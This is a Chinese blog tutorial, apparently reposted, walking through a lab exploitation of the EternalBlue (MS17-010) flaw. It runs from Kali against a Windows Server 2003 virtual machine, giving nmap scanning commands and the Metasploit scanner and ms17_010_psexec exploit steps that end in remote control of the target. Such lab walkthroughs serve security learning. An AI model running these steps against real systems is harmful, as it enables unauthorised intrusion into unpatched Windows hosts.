当前位置:   article > 正文

Linux(kali)永恒之蓝(ms17-010)漏洞实验_linux里有ms17-010漏洞吗

linux里有ms17-010漏洞吗

0.准备实验机

一台kali的,一台windows。
windows这台有永恒之蓝漏洞即可,2003,2008都可以。
我是用的cn_win_srv_2003_r2_enterprise_with_sp2_vl_cd1_X13-46432.iso,装的是Windows Server 2003 Standard x64 Edition

1.查看ip

1.1查看kali机的ip

ifconfig
  • 1

图1.1

1.2查看windows机的ip

ipconfig
  • 1

图1.2

2.扫描漏洞

nmap 192.168.206.0/24				#扫描指定网段中的ip、端口情况
nmap -sV -O 192.168.206.132			#查看该ip主机的操作系统
nmap --script=vuln 192.168.206.132	#对指定ip进行漏洞扫描
  • 1
  • 2
  • 3

图2.1
图2.2
可以查看到192.168.206.132的主机是windows2003,并且对该ip扫描漏洞可以查看到ms17-010漏洞。

3.开始攻击

3.1进入msf安全框架

msfconsole	#进入msf安全框架
help				#查看帮助
  • 1
  • 2

图3.1

3.2查找攻击模块

search ms17-010
  • 1

图3.2
可以看到有五个模块供我们选择。

3.3使用扫描模块

use auxiliary/scanner/smb/smb_ms17_010
options	#查看有哪些选项
  • 1
  • 2

图3.3
可以看到右边有一些yesno,用一个例子来描述就是,yes是我们填表时的必填项,no是选填项,所以我们观察yes对应行的左边,有一个RHOSTSno一样是空白的,那个便是需要我们填写的内容。
同时也可以看后面的DescriptionThe target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>',所以这里填目标ip

set RHOSTS 192.168.206.132
options
  • 1
  • 2

图3.4
再次使用options命令可以看到刚刚空缺的位置已经填上了。

run
  • 1

图3.5
这两行英语啥意思自己可以翻译一下,我的理解就是主机里有ms17-010漏洞,并且和msf安全框架中的漏洞匹配度是100%

3.4使用攻击模块

search ms17-010
use exploit/windows/smb/ms17_010_psexec
  • 1
  • 2

图3.6
此时就已经进入攻击模块了,然后像进入扫描模块一样,我们把必填项都填上。

options
set RHOSTS 192.168.206.132
options
  • 1
  • 2
  • 3

图3.7
此时可以运行了。

run
  • 1

图3.8
这个时候我们已经控制到windows2003了,可以查看ip和当前路径~
图3.9

over!

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/848183
推荐阅读
相关标签
  

闽ICP备14008679号